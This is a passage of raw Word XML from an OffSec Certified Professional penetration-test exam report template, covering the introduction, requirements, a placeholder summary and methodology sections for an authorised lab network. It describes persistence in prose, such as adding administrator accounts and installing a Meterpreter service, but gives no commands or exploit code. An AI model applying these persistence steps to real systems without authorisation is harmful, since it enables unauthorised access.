          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1320" w:leader="none"/>
              <w:tab w:val="right" w:pos="9360" w:leader="dot"/>
            </w:tabs>
            <w:rPr/>
          </w:pPr>
          <w:hyperlink w:anchor="__RefHeading___Toc5485_4118114545">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="IndexLink"/>
              </w:rPr>
              <w:t>5.2.2</w:t>
              <w:tab/>
              <w:t>Post-Exploitation</w:t>
              <w:tab/>
              <w:t>23</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="clear" w:pos="9560"/>
              <w:tab w:val="left" w:pos="880" w:leader="none"/>
              <w:tab w:val="right" w:pos="9360" w:leader="dot"/>
            </w:tabs>
            <w:rPr/>
          </w:pPr>
          <w:hyperlink w:anchor="__RefHeading___Toc5487_4118114545">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="IndexLink"/>
              </w:rPr>
              <w:t>5.3</w:t>
              <w:tab/>
              <w:t>DC – 10.5.5.30</w:t>
              <w:tab/>
              <w:t>24</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1320" w:leader="none"/>
              <w:tab w:val="right" w:pos="9360" w:leader="dot"/>
            </w:tabs>
            <w:rPr/>
          </w:pPr>
          <w:hyperlink w:anchor="__RefHeading___Toc5489_4118114545">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="IndexLink"/>
              </w:rPr>
              <w:t>5.3.1</w:t>
              <w:tab/>
              <w:t>Initial Access – Remote Commands Execution</w:t>
              <w:tab/>
              <w:t>24</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1320" w:leader="none"/>
              <w:tab w:val="right" w:pos="9360" w:leader="dot"/>
            </w:tabs>
            <w:rPr/>
          </w:pPr>
          <w:hyperlink w:anchor="__RefHeading___Toc5491_4118114545">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="IndexLink"/>
              </w:rPr>
              <w:t>5.3.2</w:t>
              <w:tab/>
              <w:t>Post-Exploitation</w:t>
              <w:tab/>
              <w:t>25</w:t>
            </w:r>
          </w:hyperlink>
          <w:r>
            <w:rPr>
              <w:rStyle w:val="IndexLink"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyA"/>
        <w:widowControl/>
        <w:suppressAutoHyphens w:val="true"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="200"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Arial Unicode MS"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial Unicode MS"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="left" w:pos="0" w:leader="none"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="57"/>
        <w:ind w:hanging="0" w:start="0"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="__RefHeading___Toc5439_4118114545"/>
      <w:bookmarkStart w:id="1" w:name="_Toc92992231"/>
      <w:bookmarkStart w:id="2" w:name="_Toc59959346"/>
      <w:bookmarkStart w:id="3" w:name="_Toc151462865"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r>
        <w:rPr/>
        <w:t>OffSec Certified Professional Exam Report</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
      <w:bookmarkEnd w:id="2"/>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="left" w:pos="0" w:leader="none"/>
        </w:tabs>
        <w:ind w:hanging="0" w:start="0"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="__RefHeading___Toc5441_4118114545"/>
      <w:bookmarkStart w:id="5" w:name="_Toc92992232"/>
      <w:bookmarkStart w:id="6" w:name="_Toc59959347"/>
      <w:bookmarkStart w:id="7" w:name="_Toc151462866"/>
      <w:bookmarkEnd w:id="4"/>
      <w:r>
        <w:rPr/>
        <w:t>Introduction</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
      <w:bookmarkEnd w:id="6"/>
      <w:bookmarkEnd w:id="7"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyA"/>
        <w:spacing w:lineRule="auto" w:line="288"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="DejaVu Sans" w:hAnsi="DejaVu Sans"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="DejaVu Sans" w:hAnsi="DejaVu Sans"/>
        </w:rPr>
        <w:t>The OffSec Certified Professional exam report contains all efforts that were conducted in order to pass the OffSec Certified Professional exam. This report should contain all items that were used to pass the overall exam and it will be graded from a standpoint of correctness and fullness to all aspects of the exam. The purpose of this report is to ensure that the student has a full understanding of penetration testing methodologies as well as the technical knowledge to pass the qualifications for the OffSec Certified Professional.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="left" w:pos="0" w:leader="none"/>
        </w:tabs>
        <w:ind w:hanging="0" w:start="0"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="__RefHeading___Toc5443_4118114545"/>
      <w:bookmarkStart w:id="9" w:name="_Toc92992233"/>
      <w:bookmarkStart w:id="10" w:name="_Toc59959348"/>
      <w:bookmarkStart w:id="11" w:name="_Toc151462867"/>
      <w:bookmarkEnd w:id="8"/>
      <w:r>
        <w:rPr/>
        <w:t>Objective</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9"/>
      <w:bookmarkEnd w:id="10"/>
      <w:bookmarkEnd w:id="11"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyA"/>
        <w:spacing w:lineRule="auto" w:line="288"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="DejaVu Sans" w:hAnsi="DejaVu Sans"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="DejaVu Sans" w:hAnsi="DejaVu Sans"/>
        </w:rPr>
        <w:t>The objective of this assessment is to perform an internal penetration test against the OffSec Lab and Exam network. The student is tasked with following a methodical approach to obtaining access to the objective goals. This test should simulate an actual penetration test and how you would start from beginning to end, including the overall report. An example page has already been created for you in the latter portions of this document that should give you ample information on what is expected to pass this course. Use the sample report as a guideline to get you through the reporting.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="left" w:pos="0" w:leader="none"/>
        </w:tabs>
        <w:ind w:hanging="0" w:start="0"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:id="12" w:name="__RefHeading___Toc5445_4118114545"/>
      <w:bookmarkStart w:id="13" w:name="_Toc92992234"/>
      <w:bookmarkStart w:id="14" w:name="_Toc59959349"/>
      <w:bookmarkStart w:id="15" w:name="_Toc151462868"/>
      <w:bookmarkEnd w:id="12"/>
      <w:r>
        <w:rPr/>
        <w:t>Requirements</w:t>
      </w:r>
      <w:bookmarkEnd w:id="13"/>
      <w:bookmarkEnd w:id="14"/>
      <w:bookmarkEnd w:id="15"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyA"/>
        <w:spacing w:lineRule="auto" w:line="288"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue"/>
        </w:rPr>
        <w:t>The student will be required to fill out this penetration testing report fully and to include the following sections:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:lineRule="auto" w:line="264"/>
        <w:ind w:hanging="360" w:start="720" w:end="0"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NoneA"/>
          <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue"/>
        </w:rPr>
        <w:t>Overall High-Level Summary and Recommendations (non-technical)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:lineRule="auto" w:line="264"/>
        <w:ind w:hanging="360" w:start="720" w:end="0"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NoneA"/>
          <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue"/>
        </w:rPr>
        <w:t>Methodology walkthrough and detailed outline of steps taken</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:lineRule="auto" w:line="264"/>
        <w:ind w:hanging="360" w:start="720" w:end="0"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NoneA"/>
          <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue"/>
        </w:rPr>
        <w:t>Each finding with included screenshots, walkthrough, sample code, and proof.txt if applicable.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:lineRule="auto" w:line="264"/>
        <w:ind w:hanging="360" w:start="720" w:end="0"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NoneA"/>
          <w:rFonts w:ascii="DejaVu Sans" w:hAnsi="DejaVu Sans"/>
        </w:rPr>
        <w:t>Any additional items that were not included</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Arial Unicode MS"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="en-ZA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial Unicode MS" w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="en-ZA"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="left" w:pos="0" w:leader="none"/>
        </w:tabs>
        <w:ind w:hanging="0" w:start="0"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:id="16" w:name="__RefHeading___Toc5447_4118114545"/>
      <w:bookmarkStart w:id="17" w:name="_Toc92992235"/>
      <w:bookmarkStart w:id="18" w:name="_Toc59959350"/>
      <w:bookmarkStart w:id="19" w:name="_Toc151462869"/>
      <w:bookmarkEnd w:id="16"/>
      <w:r>
        <w:rPr/>
        <w:t>High-Level Summary</w:t>
      </w:r>
      <w:bookmarkEnd w:id="17"/>
      <w:bookmarkEnd w:id="18"/>
      <w:bookmarkEnd w:id="19"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyA"/>
        <w:spacing w:lineRule="auto" w:line="288"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DefaultParagraphFont"/>
          <w:rFonts w:ascii="DejaVu Sans" w:hAnsi="DejaVu Sans"/>
        </w:rPr>
        <w:t>John Doe was tasked with performing an internal penetration test towards OffSec Labs. An internal penetration test is a dedicated attack against internally connected systems. The focus of this test is to perform attacks, similar to those of a hacker and attempt to infiltrate OffSec’s internal lab systems – the THINC.local</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DefaultParagraphFont"/>
          <w:rFonts w:ascii="DejaVu Sans" w:hAnsi="DejaVu Sans"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> domain. John</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DefaultParagraphFont"/>
          <w:rFonts w:ascii="DejaVu Sans" w:hAnsi="DejaVu Sans"/>
        </w:rPr>
        <w:t>’s overall objective was to evaluate the network, identify systems, and exploit flaws while reporting the findings back to OffSec.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyA"/>
        <w:spacing w:lineRule="auto" w:line="288"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="DejaVu Sans" w:hAnsi="DejaVu Sans"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="DejaVu Sans" w:hAnsi="DejaVu Sans"/>
        </w:rPr>
        <w:t>When performing the internal penetration test, there were several alarming vulnerabilities that were identified on OffSec’s network. When performing the attacks, John was able to gain access to multiple machines, primarily due to outdated patches and poor security configurations.  During the testing, John had administrative level access to multiple systems. All systems were successfully exploited and access granted.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="left" w:pos="0" w:leader="none"/>
        </w:tabs>
        <w:ind w:hanging="0" w:start="0"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:id="20" w:name="__RefHeading___Toc5449_4118114545"/>
      <w:bookmarkStart w:id="21" w:name="_Toc92992236"/>
      <w:bookmarkStart w:id="22" w:name="_Toc59959351"/>
      <w:bookmarkStart w:id="23" w:name="_Toc151462870"/>
      <w:bookmarkEnd w:id="20"/>
      <w:r>
        <w:rPr/>
        <w:t>Recommendations</w:t>
      </w:r>
      <w:bookmarkEnd w:id="21"/>
      <w:bookmarkEnd w:id="22"/>
      <w:bookmarkEnd w:id="23"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyA"/>
        <w:spacing w:lineRule="auto" w:line="288"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="DejaVu Sans" w:hAnsi="DejaVu Sans"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="DejaVu Sans" w:hAnsi="DejaVu Sans"/>
        </w:rPr>
        <w:t>John recommends patching the vulnerabilities identified during the testing to ensure that an attacker cannot exploit these systems in the future. One thing to remember is that these systems require frequent patching and once patched, should remain on a regular patch program to protect additional vulnerabilities that are discovered at a later date.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="left" w:pos="0" w:leader="none"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="240"/>
        <w:ind w:hanging="0" w:start="0"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:id="24" w:name="__RefHeading___Toc5451_4118114545"/>
      <w:bookmarkStart w:id="25" w:name="_Toc92992237"/>
      <w:bookmarkStart w:id="26" w:name="_Toc59959352"/>
      <w:bookmarkStart w:id="27" w:name="_Toc151462871"/>
      <w:bookmarkEnd w:id="24"/>
      <w:r>
        <w:rPr/>
        <w:t>Methodologies</w:t>
      </w:r>
      <w:bookmarkEnd w:id="25"/>
      <w:bookmarkEnd w:id="26"/>
      <w:bookmarkEnd w:id="27"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyA"/>
        <w:spacing w:lineRule="auto" w:line="288"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="DejaVu Sans" w:hAnsi="DejaVu Sans"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="DejaVu Sans" w:hAnsi="DejaVu Sans"/>
        </w:rPr>
        <w:t>John utilized a widely adopted approach to performing penetration testing that is effective in testing how well the OffSec Labs and Exam environments are secure. Below is a breakout of how John was able to identify and exploit the variety of systems and includes all individual vulnerabilities found.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="left" w:pos="0" w:leader="none"/>
        </w:tabs>
        <w:ind w:hanging="0" w:start="0"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:id="28" w:name="__RefHeading___Toc5453_4118114545"/>
      <w:bookmarkStart w:id="29" w:name="_Toc92992238"/>
      <w:bookmarkStart w:id="30" w:name="_Toc59959353"/>
      <w:bookmarkStart w:id="31" w:name="_Toc151462872"/>
      <w:bookmarkEnd w:id="28"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DefaultParagraphFont"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Information Gathering</w:t>
      </w:r>
      <w:bookmarkEnd w:id="29"/>
      <w:bookmarkEnd w:id="30"/>
      <w:bookmarkEnd w:id="31"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyA"/>
        <w:spacing w:lineRule="auto" w:line="288"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="DejaVu Sans" w:hAnsi="DejaVu Sans"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="DejaVu Sans" w:hAnsi="DejaVu Sans"/>
        </w:rPr>
        <w:t>The information gathering portion of a penetration test focuses on identifying the scope of the penetration test. During this penetration test, John was tasked with exploiting the lab and exam network. The specific IP addresses were:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyA"/>
        <w:spacing w:lineRule="auto" w:line="288"/>
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Exam Network:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyA"/>
        <w:spacing w:lineRule="auto" w:line="288"/>
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>192.168.232.55, 172.16.203.134, 172.16.203.135, 172.16.203.136</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="left" w:pos="0" w:leader="none"/>
        </w:tabs>
        <w:ind w:hanging="0" w:start="0"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="32" w:name="__RefHeading___Toc5455_4118114545"/>
      <w:bookmarkStart w:id="33" w:name="_Toc92992239"/>
      <w:bookmarkStart w:id="34" w:name="_Toc59959354"/>
      <w:bookmarkStart w:id="35" w:name="_Toc151462873"/>
      <w:bookmarkEnd w:id="32"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Service Enumeration</w:t>
      </w:r>
      <w:bookmarkEnd w:id="33"/>
      <w:bookmarkEnd w:id="34"/>
      <w:bookmarkEnd w:id="35"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyA"/>
        <w:spacing w:lineRule="auto" w:line="288"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="DejaVu Sans" w:hAnsi="DejaVu Sans"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="DejaVu Sans" w:hAnsi="DejaVu Sans"/>
        </w:rPr>
        <w:t>The service enumeration portion of a penetration test focuses on gathering information about what services are alive on a system or systems. This is valuable for an attacker as it provides detailed information on potential attack vectors into a system. Understanding what applications are running on the system gives an attacker needed information before performing the actual penetration test.  In some cases, some ports may not be listed.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="left" w:pos="0" w:leader="none"/>
        </w:tabs>
        <w:ind w:hanging="0" w:start="0"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:id="36" w:name="__RefHeading___Toc5457_4118114545"/>
      <w:bookmarkStart w:id="37" w:name="_Toc92992240"/>
      <w:bookmarkStart w:id="38" w:name="_Toc59959355"/>
      <w:bookmarkStart w:id="39" w:name="_Toc151462874"/>
      <w:bookmarkEnd w:id="36"/>
      <w:r>
        <w:rPr/>
        <w:t>Penetration</w:t>
      </w:r>
      <w:bookmarkEnd w:id="37"/>
      <w:bookmarkEnd w:id="38"/>
      <w:bookmarkEnd w:id="39"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyA"/>
        <w:spacing w:lineRule="auto" w:line="288"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="DejaVu Sans" w:hAnsi="DejaVu Sans"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="DejaVu Sans" w:hAnsi="DejaVu Sans"/>
        </w:rPr>
        <w:t>The penetration testing portions of the assessment focus heavily on gaining access to a variety of systems. During this penetration test, John was able to successfully gain access to 10 out of the 50 systems.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="left" w:pos="0" w:leader="none"/>
        </w:tabs>
        <w:ind w:hanging="0" w:start="0"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:id="40" w:name="__RefHeading___Toc5459_4118114545"/>
      <w:bookmarkStart w:id="41" w:name="_Toc92992241"/>
      <w:bookmarkStart w:id="42" w:name="_Toc59959356"/>
      <w:bookmarkStart w:id="43" w:name="_Toc151462875"/>
      <w:bookmarkEnd w:id="40"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="None"/>
        </w:rPr>
        <w:t>Maintaining Access</w:t>
      </w:r>
      <w:bookmarkEnd w:id="41"/>
      <w:bookmarkEnd w:id="42"/>
      <w:bookmarkEnd w:id="43"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyA"/>
        <w:spacing w:lineRule="auto" w:line="288"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="None"/>
          <w:rFonts w:ascii="DejaVu Sans" w:hAnsi="DejaVu Sans"/>
        </w:rPr>
        <w:t>Maintaining access to a system is important to us as attackers, ensuring that we can get back into a system after it has been exploited is invaluable. The maintaining access phase of the penetration test focuses on ensuring that once the focused attack has occurred (i.e. a buffer overflow), we have administrative access over the system again. Many exploits may only be exploitable once and we may never be able to get back into a system after we have already performed the exploit.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyA"/>
        <w:spacing w:lineRule="auto" w:line="288"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="None"/>
          <w:rFonts w:ascii="DejaVu Sans" w:hAnsi="DejaVu Sans"/>
        </w:rPr>
        <w:t>John added administrator and root level accounts on all systems compromised. In addition to the administrative/root access, a Metasploit meterpreter service was installed on the machine to ensure that additional access could be established.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="left" w:pos="0" w:leader="none"/>
        </w:tabs>
        <w:ind w:hanging="0" w:start="0"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:id="44" w:name="__RefHeading___Toc5461_4118114545"/>
      <w:bookmarkStart w:id="45" w:name="_Toc92992242"/>
      <w:bookmarkStart w:id="46" w:name="_Toc59959357"/>
      <w:bookmarkStart w:id="47" w:name="_Toc151462876"/>
      <w:bookmarkEnd w:id="44"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="None"/>
        </w:rPr>
        <w:t>House Cleaning</w:t>
      </w:r>
      <w:bookmarkEnd w:id="45"/>
      <w:bookmarkEnd w:id="46"/>
      <w:bookmarkEnd w:id="47"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyA"/>
        <w:spacing w:lineRule="auto" w:line="288"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="None"/>
          <w:rFonts w:ascii="DejaVu Sans" w:hAnsi="DejaVu Sans"/>
        </w:rPr>
        <w:t>The house cleaning portions of the assessment ensures that remnants of the penetration test are removed. Often fragments of tools or user accounts are left on an organizations computer which can cause security issues down the road. Ensuring that we are meticulous and no remnants of our penetration test are left over is important.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyA"/>
        <w:spacing w:lineRule="auto" w:line="288"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="None"/>
          <w:rFonts w:ascii="DejaVu Sans" w:hAnsi="DejaVu Sans"/>
        </w:rPr>
        <w:t>After the trophies on both the lab network and exam network were completed, John removed all user accounts and passwords as well as the Meterpreter services installed on the system. OffSec should not have to remove any user accounts or services from the system.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal1"/>
        <w:rPr>
          <w:vanish/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:vanish/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal1"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="9355" w:type="dxa"/>
        <w:jc w:val="start"/>
        <w:tblInd w:w="19" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblCellMar>
          <w:top w:w="80" w:type="dxa"/>
          <w:start w:w="80" w:type="dxa"/>
          <w:bottom w:w="80" w:type="dxa"/>
          <w:end w:w="80" w:type="dxa"/>
        </w:tblCellMar>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9000"/>
        <w:gridCol w:w="354"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="11440" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9000" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="FFFFFF"/>
              <w:start w:val="single" w:sz="8" w:space="0" w:color="FFFFFF"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="FFFFFF"/>
              <w:end w:val="single" w:sz="8" w:space="0" w:color="FFFFFF"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Heading1"/>
              <w:widowControl w:val="false"/>
              <w:tabs>
                <w:tab w:val="clear" w:pos="720"/>
                <w:tab w:val="left" w:pos="0" w:leader="none"/>
              </w:tabs>
              <w:spacing w:before="113" w:after="57"/>
              <w:ind w:hanging="0" w:start="0"/>
              <w:rPr/>
            </w:pPr>
